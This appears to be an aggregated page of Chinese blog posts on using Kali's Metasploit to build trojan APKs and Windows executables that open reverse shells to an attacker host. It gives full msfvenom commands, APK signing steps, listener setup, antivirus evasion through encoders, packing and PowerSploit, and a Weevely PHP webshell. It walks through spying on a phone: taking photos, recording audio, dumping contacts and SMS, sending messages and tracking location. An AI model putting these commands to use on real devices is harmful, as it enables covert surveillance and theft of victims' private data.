-
2022-05-06 10:48:19
得到kali本机IP,设置端口
利用msf payload模块生成木马
命令:msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.174.129 lport=5555 R > 1.apk
木马生成后
开启我们的监听模块msfconsole
进入控制端后,设置一个安卓的playload(之前使用过的)
设置监听kali虚拟机的ip地址和端口号(与之前生成apk木马文件的命令参数相同)
run启用,等待木马被点击。
木马成功执行后可进行操作,已经拿下目标喽
打开摄像头命令操作,这里我的摄像头没有开启。
感谢各位的观看,希望能够帮助到你们!
更多相关内容 -
Kali远程控制Android系统(Metasploit)
2019-06-24 22:42:55本片文章介绍在使用Linux远程控制Android手机 一、查看Metasploit工具中可以在Android系统下使用的payload类型 可以看到有9种可以在Android下使用的payload 二、端口映射、以及软件签名问题 端口映射问题 ...- 前一篇文章介绍使用kali远程控制Windows系统,参阅:https://blog.csdn.net/qq_41453285/article/details/93536099
- 本篇文章介绍使用kali远程控制Android手机
一、查看Metasploit工具中可以在Android系统下使用的payload类型
- 可以看到有9种可以在Android下使用的payload
- 这些payload可以作为我们后面攻击的软件的生成工具
二、端口映射问题
- 如果我们的手机与使用的计算机处在同一局域网,但是虚拟机使用的是NAT模式。那么只有我们使用的计算机才可以访问到该虚拟机,其他设备都是无法访问该虚拟机的。那么就需要端口映射了
- 假设计算机的IP为(192.168.1.100)。Android手机的IP为(192.168.1.*)。虚拟机的IP为(192.168.169.130):
- 第一步:打开VMware虚拟机网络编辑器
- 第二步:设置ANT端口的映射(设置之后,凡是发往计算机9999端口的流量都会转发到虚拟机的9999端口上,这样虚拟机就能够接收到Android的连接了)
三、远程控制Android手机演示
- 本案例中,Linux采用桥接模式,与Android手机连接在同一局域网中
①使用msfvenom命令生成被控端payload
- 第一步:下面我以“android/meterpreter/reverse_tcp”类型的payload为例,然后查看该类型需要的参数(图片显示需要IP和端口)
msfconsole #进入Metasploit软件 use android/meterpreter/reverse_tcp #选择payload类型 show options #查看payload所需参数
- 查看完参数之后,退出Metasploit
- 第二步:生成payload(msfvenom命令中默认没有apk这种格式的文件。此处使用R来替代-f和-o)
- 可以在kali中找到生成的这个文件,我的是放在/root目录下
②为软件签名
- 为什么要签名:
- 如果使用上面ANT端口映射的话,那么创建的payload就不能够使用虚拟机的IP地址,而只能使用计算机的IP地址
- 并且这个apk不能直接在Android中直接运行,因为这个apk需要一个签名才可以运行。下面我们为这个apk生成一个签名。创建签名需要使用Keytool、JARsigner、zipalign这3个软件。Kali中内置了前2个,第3个需要安装
- 第一步:使用keytool生成一个key文件。会让你输入该key的名称、单位、地址等等信息,最终生成一个key文件
keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
- 第二步:使用该key文件配合JARsigner为APK签名
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore pentest.apk alias_name
- 第三步:然后使用JARsigner验证签名
jarsigner -verify -verbose -certs pentest.apk
- 到此为止,就完成了签名过程,此apk就可以在Android中使用了
③开启主动端,等待被控端连接
- 第一步:使用msfconsole开启Metasploit
- 第二步:主动端使用handler
- 第三步:为handler设置参数(payload版本类型、IP地址、端口)
- 第四步:开启监听(等待被控端接入)
④将生成好的被控端payload安装在Android中,并打开连接到主控端
- 第一步:将kali中的这个.apk想办法弄到手机里安装(自己想办法),安装时可能会提示危险,不管它,继续安装即可。安装完成之后会在手机上看到一个软件,点击打开就行(不会真有软件打开,一闪而过)
- 第二步:在Android中打开此软件之后,Kali就会收到连接,之后就可以做相关的事情了
- 第三步:查看Android中可以使用的命令和功能。Android比较使用的功能有两类:
- 一类是Webcam(主要与摄像头和录音有关)
- 一类是Android
- 第四步:查看Android中可以使用的所有摄像头(可以看到有前置、后置两个摄像头)
⑤远程控制Android手机拍照
- 第一步:使用后置摄像头(编号为1)拍照(照片存放在/root/目录下)
- 第二步:在root目录下可以看到有一张拍摄的照片
⑥远程控制Android手机录视频
- 第一步:使用后置摄像头录制视频(可以看到在root目录下生成一个网页)
- 第二步:打开这个网页,Android会实时的录制视频,并在该网页中显示
⑦远程控制Android手机录音
- 直接输入record_mic命令启动Android中的录音机,并在root目录下生成一个wav录音文件
⑧查看Android手机是否已经执行root权限
⑨导出Android手机的电话本
- 可以看到或得目标手机中的43位联系人方式,并存在“contacts_dump_20190624072811.txt”文件中
⑩导出Android手机的短信记录
- 可以看到短信已经被导出,存放在“sms_dump_20190624072946.txt”文件中
⑪远程控制目标手机发送短信
- 向“152*****”的手机发送信息,内容为“helloworld”
⑫对目标手机进行定位,查看目标手机位置信息
- 查看给的网页就可以实时的查看目标手机所在位置(是一个谷歌地图,可能在国内打不开这个网页)
-
kali 控制安卓手机
2022-01-06 12:51:27msfvenom -p android/meterpreter/reverse_tcp LHOST=kali的ip地址 LPORT=4444 R > t.apk 生成apk下载到手机 可以利用kali Apache2 在局域网内直接下载apk或其他办法 sudo cp t.apk /var/www/html //拷贝...ip add //查看kali 的ip地址 虚拟机桥接模式
msfvenom -p android/meterpreter/reverse_tcp LHOST=kali的ip地址 LPORT=4444 R > t.apk
生成apk下载到手机
可以利用kali Apache2 在局域网内直接下载apk或其他办法
sudo cp t.apk /var/www/html //拷贝到此目录可网页访问
vi /var/www/html/index.html // 第一次应修改html 网页内容 ,加入下载链接
手机端下载后
电脑端运行,发现鸿蒙系统直接安不上,可能需要进一步操作。
msfconsole
use multi/handler //使用一个模块在kali设置一个监听的程序
set payload android/meterpreter/reverse_tcp//设置荷载 安卓机
set LHOST kaliIP
exploit
手机运行起来,就建立了链接。就可进一步进行操作。
我这个中间出现了连接拒绝提示,但是还是可以断断续续进行操作的,可能是趁手机不注意就成功了。。应该是现在手机的安全做的比较好,
sysinfo //查看手机信息
app_list //查看手机app信息
webcam_snap //拍照
保存到此目录
成功拍照。
:我的手机拍照过程有声音,
好歹顺下来了
写的很粗糙,仅供参考吧。
-
六、Kali Linux 2 远程控制
2022-02-20 00:43:29Kali Linux 网络渗透测试远程控制
那么回过头来看,如果目标计算机上运行的VSFTPD v2.3.4被黑客使用笑脸漏洞成功渗透,就会自动在6200端口打开一个连接,而黑客可以通过这个连接实现对目标的控制。如果将这个连接比作一个很小的入口,它可能刚刚能容纳一个人爬行通过,而我们这一章要介绍的就是如何将这个入口变大,大到卡车都可以进出自由。这个大的入口就是我们所说的远程控制。
如果说漏洞是黑客进入计算机的入口,我们其实不仅仅要发现了这个入口,还需要找到开启它的钥匙。
一、为什么6200端口变成了一个 “后门”
刚看到这个标题可能有人会觉得奇怪,端口不就是数据的出入口吗,6200端口打开了,黑客不就可以进入了吗?当然并非如此,试想一台计算机通常会开放几十个端口,尤其是服务器一般都会开放80端口,为什么黑客不直接从80端口进去呢?
使用netcat去连接 目标的80端口:
接下来我们使用ftp命令中特殊的用户名(例如“user:)”,其他以笑脸结尾的字符也可以)来激活这个漏洞,使其开启6200端口。
使用netcat去连接 目标的6200端口:
二、远程控制简介
远程控制程序是一个很常见的计算机术语,指的就是可以在一台设备上操纵另一台设备的软件。远程控制程序一般分成两个部分——被控端和主控端。
我们可以将远程控制软件分为正向控制和反向控制两种。
1、正向控制
2、反向控制
三、如何使用MSFPC生成被控端
Kali Linux 2中提供了一个名为MSFPC(MSFvenom Payload Creator) 的工具,它其实是我们下一节中会讲到的MSFvenom的优化版,使用起来更简单,利用这个工具就可以轻松地生成各种系统的远程控制被控端。
四、如何在Kali Linux 2 中生成被控端
下面给出了msfvenom的几个常见的使用参数。
Options: -p, --payload <payload>指定要生成的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定 -f, --format <format>指定输出格式 (可以使用 --help-formats 来获取msf支持的输出格式列表) -o, --out <path>指定存储payload的位置 --payload-options 列举payload的标准选项 --help-formats 查看msf支持的输出格式列表
root@kali:~#msfvenom -l payloads
这个命令执行的结果列出了当前系统的一共486个Payload,如图所示。
kali@kali:~$ msfvenom --list-options -p windows/meterpreter/reverse_tcp
执行之后,我们就可以看见这个Payload的详细信息了,如图所示。
五、如何在Kali Linux 2 中启动主控端
首先打开一个终端然后输入msfconsole启动Metasploit
root@kali:~# msfconsole
首先打开一个终端然后输入msfconsole启动Metasploit
Msf5> use exploit/multi/handler
六、远程控制被控端与杀毒软件的博弈
到目前为止,杀毒软件的技术主要使用了以下3种技术,本章提到的远程控制被控端也可看作病毒的一种。
1. 基于文件扫描的反病毒技术。这种技术主要依靠对程序的二进制代码进行检测,反病毒工程师将病毒样本中的一段特有的二进制代码串提取出来作为特征码,并将其加入病毒库,以后检测程序时看它是否包含这个特征码。
2. 基于内存扫描的反病毒技术。有的病毒程序可能通过各种手段躲过文件扫描,但是想要达到目的,它就需要运行。程序在运行后会将自身释放到内存中,释放后的文件结构与未执行的文件相比有较大的差异。因此杀毒软件使用一套针对内存的特征码。
3. 基于行为监控的反病毒技术。以上两种技术只能查杀已知病毒,对病毒库中不包含的病毒基本没有办法。而基于行为监控的反病毒技术则会监控程序的行为,如果它在执行后会进行一些非正规的、可疑的操作,例如修改系统的注册表的重要部分,则会被视作病毒而被查杀。
msfvenom提供的免杀方法修改特征码,就是修改病毒样本中的一段特有的二进制代码串。 msfvenom针对这种扫描方式提供了一种混淆编码的解决方案。msf编码器可以将原可执行程序重新编码,生成一个新的二进制文件,这个文件运行以后,msf编码器会将原始程序解码到内存中并执行。这样就可以在不影响程序执行的前提下,躲避杀毒软件的特征码查杀。
我们可以使用命令:
kali@kali:~$ msfvenom -l encoders
加壳也是对抗文件扫描和内存扫描的常用手段,Kali Linux中提供了一个很流行的加壳工具upx(见图),启动它的方式很简单。
PowerSploit提供的免杀方案
最新的kali linux2020中提供了PowerSploit,这是一个基于PowerShell的工具,PowerShell是微软提供的一个程序,PowerShell的功能相当于UNIX系统中的BASH命令行,它是个很强大的工具,学会使用它对Windows上的安全工作有很大的帮助。
启动之后的PowerSploit其实是一个目录,里面还包含了其它一些目录内容,如果要使用这个工具,需要将PowerSploit目录(见图)当作一个网站发布出去。
AntivirusBypass的思想很简单,既然被控端程序中的一段内容是特征码,那么我们就将被控端程序分成n个部分,然后分别使用杀软检查,如果哪个部分报毒那么说明这个部分存在特征码。接着再将报毒部分分成n个部分,再分别使用杀毒软件检查,逐渐找到特征码所在的位置。想要了解Find-AVSignature.ps1的方法可以使用get-help。
PowerSploit中提供的第2部分功能是CodeExecution,这里面主要提供了4个脚本:
Invoke-DllInjection.ps1
Invoke-ReflectivePEInjection.ps1
Invoke-Shellcode.ps1
Invoke-WmiCommand.ps1
七、Meterpreter在各种操作系统中的应用
首先查找一下Metasploit中可以在Android下运行的Meterpreter:
root@kali:~# msfvenom -l payloads
Meterpreter中支持的命令有很多,一共可以分成9个种类,分别为:
核心命令(Core Commands)
文件系统命令(File System Commands)
网络命令(Networking Commands)
系统命令(System Commands)
用户接口相关命令(User Interface Commands)
摄像头相关命令(Webcam Commands)
控制权限提升命令(Elevate Commands)
密码数据库命令(Password database Commands)
时间戳相关命令(Timestomp Commands)
八、Metasploit5 中的Evasion模块
在启动Metasploit时,就可以看到里面的一些信息
使用“show evasion”来列出Metasploit的所有Evasion模块
九、通过Web应用程序实现远程控制
我们所接触的PHP、JSP这样的语言主要是用来开发web应用程序的,但是其实它们的功能十分强大,也可以实现远程控制的功能。目前有很多工具都提供了自动生成木马的功能,例如国内十分流行的“中国菜刀”、“中国蚁剑”、“冰蝎”等。这里我们以kali中已经内置的一个工具Weevely为例,它是一个专门用来生成PHP语言木马的工具,同时也提供了丰富的管理功能。
kali@kali:~$ weevely generate 123456 /home/kali/Downloads/testweb.php Generated '/home/kali/Downloads/testweb.php' with password '123456' of 764 byte size.
Weevely来连接这个后门,连接的命令格式为:
Weevely 木马URL 木马密码
当前木马url为http://192.168.157.132/dvwa/hackable/uploads/testweb.php,所以连接时的命令和执行的结果如下所示:
kali@kali:~$ weevely http://192.168.157.132/dvwa/hackable/uploads/testweb.php 123456 [+] weevely 4.0.1 [+] Target: 192.168.157.132 [+] Session: /home/kali/.weevely/sessions/192.168.157.132/testweb_0.session [+] Browse the filesystem or execute commands starts the connection [+] to the target. Type :help for more information. weevely>
总结:
本章中讲解了如何生成远程控制软件,并且以Android和Windows作为目标系统,通过实例介绍了Metasploit工具中提供的Meterpreter模块,Meterpreter功能极为强大,还有各种的免杀技术。在下一章中我们会详细介绍漏洞渗透模块的使用和开发。
-
Kali远程控制Windows系统(Metasploit)
2019-06-24 22:40:52第一步:下面我们用msfvenom命令使用反向远程控制程序“windows/meterpreter/reverse_tcp”。该软件执行时自动连接IP“192.168.43.77”,连接的端口为“5000”,生成的文件为payload.exe,在/root目录下 msfvenom -... -
Kali渗透测试:远程控制程序基础
2022-05-07 15:44:18Kali渗透测试:远程控制程序基础 测试环境: 攻击机:Linux kali 5.16.0-kali (IP:192.168.68.248) 靶机:WinXP (IP:192.168.68.159) Win7 (IP:192.168.68.206) 1. 使用MSFPC生成被控端 远程控制软件中的被控端和... -
Kali 下对安卓手机的攻击
2022-01-29 16:54:05Kali对安卓手机的攻击(渗透) 我们首先需要确定本机IP 这很简单,对于Kali来说我们需要打开终端并键入 ifconfig 即可获取自己的IP,然后我们需要确定安卓手机也就是被攻击者的IP,只需键入 fping -g 本机IP... -
Kali Linux利用MSF入侵安卓手机(小白版超详细)
2022-04-19 16:42:14Kali Linux利用MSF入侵安卓手机新手下白版最详细,查看对方手机系统信息,查看对方手机安装哪些app文件,远程控制对方手机拍摄一张照片,远程控制对方手机开起视频聊天,实时查看对方手机的信息,获取对方手机的... -
Kali 2020:用Metasploit实验入侵自己的安卓手机
2020-11-01 22:10:52目标:使用Kali里的Metasploit远程控制自己的安卓手机 (先写个大体的流程,改天做成详细教程。仅限于对自己的手机做实验,请勿用于非法行为) 一:生产apk安卓应用 1,使用msfvenom生成一个预设定向连接kali主机的... -
kali metasploit 远程控制Windows
2020-07-08 14:10:31一、在kali中生成被控制端程序 root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.88.188 LPORT=5901 -f exe > test.exe #生成Windows端 msfvenom... -
kali控制安卓(拍照、通讯录、GPS等)
2020-10-06 22:55:08注意:ip地址是kali的,不是目标手机的 2.开启kali自带的web服务器 sudo service apache2 start 3.将apk拷贝到服务器根目录 sudo cp tst.apk /var/www/html 4.目标手机下载安装txt.apk 方法一:目标手机直接在... -
Kali Linux-MSF远控局域网手机
2020-02-23 21:41:33本文目的:演示如何借助Kali Linux系统的Metasploit渗透测试框架生成远程控制木马,然后感染局域网内的Android手机,从而实现对受害者手机数据的读取、音频的窃听、位置的获取、软件安装或卸载等。 环境说明 ... -
手机端(安卓)安装 Kali Linux 系统详细教程
2020-01-11 09:37:23关于安卓端安装 Kali Linux 的详细教程 -
Kali Linux在安卓上下木马病毒并控制
2021-06-12 10:18:001.在kali提示行中输入msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT=8888 R > tst.apk LHOST=后加上kali的ip, 2.打开kali的命令提示符 输入sudo service apache2 start 3.sudo cp tst.apk /var/... -
Kali模拟-在Android端窃取信息
2021-02-02 23:12:33手机作为当今时代的必须品,人手一台是基本配置,但是手机作为危险源之一也时刻威胁我们的心灵安全。...安全起见:主控端使用kali虚拟机,被控端Android手机(献上个人手机)。 此处没有恶意攻击!仅用于测试!! -
kali安装卡在最后一步_手机端(安卓)安装 Kali Linux 系统详细教程
2020-10-25 14:30:26前言之前写有文章介绍过关于 Kali Linux 系统安装的详细教程,不过是在电脑端真机或虚拟机中的安装步骤,那么作为平时使用最多并且能方便携带的智能手机端,是否有方法或技术来实现安装呢?还确实有,这也是该文章的... -
Metasploit远程控制安卓手机,jarsigner(工具找不到)签名使用问题zipalign(工具)及解决方法
2020-12-06 13:23:171.kali linux2020.3版本,在使用msf生成安卓木马时远控手机,签名时需要3个工具,分别是keytool,jarsigner,zipalign,只提示有keytool工具,jarsigner和zipalign工具找不到. 2.在模拟器中成功,但很多命令执行不成功... -
GitHub - kalivim/AndroidControl: 超强群控,可以实时查看和控制安卓手机的安卓远程控制软件,致力于完成...
2020-12-19 04:13:38AndroidControl非常抱歉,因为工作繁忙,有很长一段时间没有更新了。 有很多人加群也没有及时通过。。。在这里郑重的说声 抱歉! 非常感谢大家的支持!我打算重构此项目的代码,下面介绍原因:去ADB化ADB很容易被... -
linux系统控制手机
2021-08-20 09:07:53adb devices 找不到设备_利用Adb控制Android手机 什么是ADB Android Debug Bridge(安卓调试桥) tools。它就是一个命令行窗口,用于通过电脑端与模拟器或者是设备之间的交互。 ADB是一个C/S架构的应用程序,由三部分... -
Kali msfvenom生成远程控制payload
2019-06-23 23:27:43在Kali Linux中产生远程控制被控端程序的方式很多,但用的最多的就是msfvenom命令 一、msfvenom命令的功能与概念 功能:用来生成一个远程控制程序 概念:msfvenom命令是渗透测试软件Metasploit的一个功能,但是... -
广域网 教你使用 IPV6 远程控制你的电脑是好事还是坏事?
2021-05-15 06:06:50五、简要演示远程控制KALI Linux SSH连接。 1.再KLAI终端中输入:ifconfig。 inet6 后面的就是ipv6的地址。 2.这个软件可以在应用宝里下载到。 3.点击“连接”。 4.点击“+”号。 5.昵称随便输入。 地址输入kali的... -
kali linux捉肉鸡教程,使用Kali中的Metasploit生成木马控制Windows系统
2021-05-12 05:21:26一、概念:Kali基于debin的数字取证系统,上面集成了很多渗透测试工具,其前身是BT5 R3(BtackTrack)。其中Metasploit是一个综合利用工具,极大的提高了攻击者的渗透效率,使用Ruby开发的,使用非常方便,进入该工具... -
使用msfvenom生成后门软件并对靶机进行远程控制
2021-12-06 22:06:25如何使用msfvenom生成后门软件并对靶机进行远程控制 -
kali metasploit 木马入侵windows和Android
2018-09-21 13:00:06windows :根据自己的kali IP 生成木马 注意shell > shell.exe之间是有空格的,LHOST是kali 本机的IP ,LPORT是自定义设置的端口,据说高端口比较好过防火墙,(但是我实验的时候感觉差不多,基于win10 的... -
Kali之安卓木马
2018-02-24 21:51:13Kali linux初体验Kali linux的安卓木马一般只能在内网操作,要想在监控互联网的安卓手机,必须要使用内网穿透,工具有很多,我使用的是NATAPP。思路如下:实现内网穿透Metasploit木马操作一、实现内网穿透进入... -
Kali系统及Frida环境配置
2021-08-02 21:28:542.环境配置二、多版本环境控制pyenv安装1.pyenv安装2.安装Python总结 前言 本文介绍Kali系统的安装和Kali系统下Frida环境的配置。 一、Kali环境基本配置 1.下载Kali系统,Vmware打开。 Kali官网 下载Vmware版本... -
攻击篇--远程控制(一)生成被控端与主控端
2022-05-08 10:22:27这是一个很经典的案例,如果将这个连接比作是正好能让一个人爬行通过,那么接下来的远程控制篇就是如何将这个缺口变大,大的卡车都可以自由出入。而这个大的入口,就是我们平常所说的远程控制。 netcat ...... -
kali攻防第9章 Metasploit之我的远程控制软件
2015-12-07 15:45:26准备工具 1、KALI系统 IP 10.10.10.131 ...1、生成木马控制程序 root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=10.10.10.131 LPORT=44